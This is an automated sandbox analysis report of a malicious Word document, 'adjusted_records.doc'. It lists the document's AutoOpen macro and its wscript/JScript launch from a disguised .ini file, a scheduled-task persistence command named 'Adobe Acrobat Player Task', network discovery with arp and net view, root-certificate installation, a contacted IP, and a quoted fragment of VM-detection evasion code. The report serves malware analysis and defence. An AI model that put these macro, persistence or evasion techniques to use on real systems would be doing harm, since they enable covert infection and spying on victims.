Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Performs a network lookup / discovery via ARP
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a
Performs a network lookup / discovery via net view
Source: unknown | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view

System Summary:

Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to development resources
Source: WINWORD.EXE | Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification label
Source: classification engine | Classification label: mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$justed_records.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVRBDE7.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: adjusted_records.doc | OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: adjusted_records.doc | OLE document summary: title field not present or empty
Source: adjusted_records.doc | OLE document summary: author field not present or empty
Source: adjusted_records.doc | OLE document summary: edited time not present or 0
Found command line output
Source: C:\Windows\System32\schtasks.exeConsole Write: ........a.~u..0......... ...................................`.....*.t.,.h.,...................................3.....G..v
Source: C:\Windows\System32\cmd.exeConsole Write: ........ ............ ..,.......E.lJ........ .......@FoJ. ..,........T,.V.lJ....".......,.........}u........`.....,.....
Queries process information (via WMI, Win32_Process)
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - select * from win32_process
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary data
Source: wscript.exe | Binary or memory string: Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True85.93.2.148;
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\adjusted_records.doc
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {6C8EBD0A-6843-4E76-AA78-1A12EAE50432} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1]
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: unknown | Process created: C:\Windows\System32\net.exe net view
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32
Writes ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile written: C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Document contains embedded VBA macrosShow sources
Source: adjusted_records.docOLE indicator, VBA macros: true
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: adjusted_records.docOLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
Document contains an embedded VBA macro which may execute processesShow sources
Source: adjusted_records.docOLE, VBA macro line: Set avfasci = CreateObject("Scripting.FileSystemObject")
Source: adjusted_records.docOLE, VBA macro line: Shell ivwubka, False
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function armando, API Shell("cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini",False)Name: armando
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: adjusted_records.docOLE, VBA macro line: Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: adjusted_records.docOLE, VBA macro line: Set avfasci = CreateObject("Scripting.FileSystemObject")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function armando, String createobject: Set avfasci = CreateObject("Scripting.FileSystemObject")Name: armando
Document contains an embedded macro with GUI obfuscationShow sources
Source: adjusted_records.docStream path 'Macros/UserForm1/o' : Found suspicious string activexobject in non macro stream
Source: adjusted_records.docStream path 'Macros/UserForm1/o' : Found suspicious string scripting.filesystemobject in non macro stream
Suspicious javascript / visual basic script found (invalid extension)Show sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Wscript called in batch mode (suppress errors)
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: taskeng.exe | Binary or memory string: Progman
Source: taskeng.exe | Binary or memory string: Program Manager
Source: taskeng.exe | Binary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\wscript.exe | System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wscript.exe | Binary or memory string: %exOf("vmware"),216,16
Source: wscript.exe | Binary or memory string: dexOf("vmware",32,217E
Source: wscript.exe | Binary or memory string: ';function inArray(what, where) {for(var i=0; i<where.length; i++) {if(what == where[i]) {return true;}}return false;}function is_uac () {var oShell = WScript.CreateObject("WScript.Shell");if(oShell.RegRead("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA") == 0) {return false;} else {return true;}}function protect () {var is_debugged = 0;var wmi = GetObject("winmgmts:root/CIMV2");var Query = wmi.ExecQuery("SELECT * FROM Win32_BIOS");for (var items = new Enumerator(Query); !items.atEnd(); items.moveNext()) {var item = items.item();t = item["SMBIOSBIOSVersion"]["toLowerCase"]();if(t.indexOf("virtualbox") >= 0 || t.indexOf("vmware") >= 0) {is_debugged = 1;}t = item["SerialNumber"]["toLowerCase"]();if(t.indexOf("vmware") >= 0 || t.indexOf("parallels") >= 0) {is_debugged = 1;}}var Query = wmi.ExecQuery("SELECT * FROM Win32_PnPEntity");for (var items = new Enumerator(Query); !items.atEnd(); items.moveNext()) {var item = items.item();var t = item["DeviceID"]["toLowerCase"]();var l = i
Contains long sleeps (>= 3 min)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Thread delayed: delay time: 200
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 3576 | Thread sleep time: -360000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3576 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 3632 | Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 3656 | Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3696 | Thread sleep time: -360000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3920 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 4076 | Thread sleep time: -180000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 4076 | Thread sleep time: -60000s >= -60s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - SELECT Model FROM Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - SELECT Model FROM Win32_ComputerSystem
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True (8 identical entries)

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (76 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (28 identical entries)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Stores large binary data to the registry
Source: C:\Windows\System32\wscript.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 85.93.2.148 187

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 424458 | Sample: adjusted_records.do... | Start date: 09/11/2017 | Architecture: WINDOWS | Score: 100

[Graph image not recoverable; process tree and per-node signatures reconstructed from the graph's node labels]

WINWORD.EXE (1): Document exploit detected (process start blacklist hit)
  cmd.exe (2): Performs a network lookup / discovery via ARP
    wscript.exe (4): Installs new ROOT certificates; connects to 85.93.2.148:443 (ARCOMPUS-MEDIANET-ASLB, Germany)
      cmd.exe (9): Performs a network lookup / discovery via ARP; via net view
        net.exe (11)
      cmd.exe (15): Performs a network lookup / discovery via ARP; via net view
        ARP.EXE (17)
      1 further process hidden (processes exceeded maximum capacity for this level)
taskeng.exe (7): Suspicious javascript / visual basic script found (invalid extension); Wscript called in batch mode (suppress errors)
  wscript.exe (8): Installs new ROOT certificates
    cmd.exe (12): Performs a network lookup / discovery via ARP
    cmd.exe (18): Performs a network lookup / discovery via ARP
      ARP.EXE (20)
  wscript.exe (22): Installs new ROOT certificates

For most nodes the graph reports that signatures exceeded the maximum capacity for that level and 2 or 3 further signatures are hidden.

Simulations

Behavior and APIs

Time | Type | Description
14:00:54 | API Interceptor | 1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
14:01:04 | API Interceptor | 24x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms
14:01:06 | Task Scheduler | Run new task: Adobe Acrobat Player Task path: wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
14:02:00 | API Interceptor | 2x Sleep call for process: taskeng.exe modified from: 60000ms to: 500ms
14:02:14 | API Interceptor | 2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot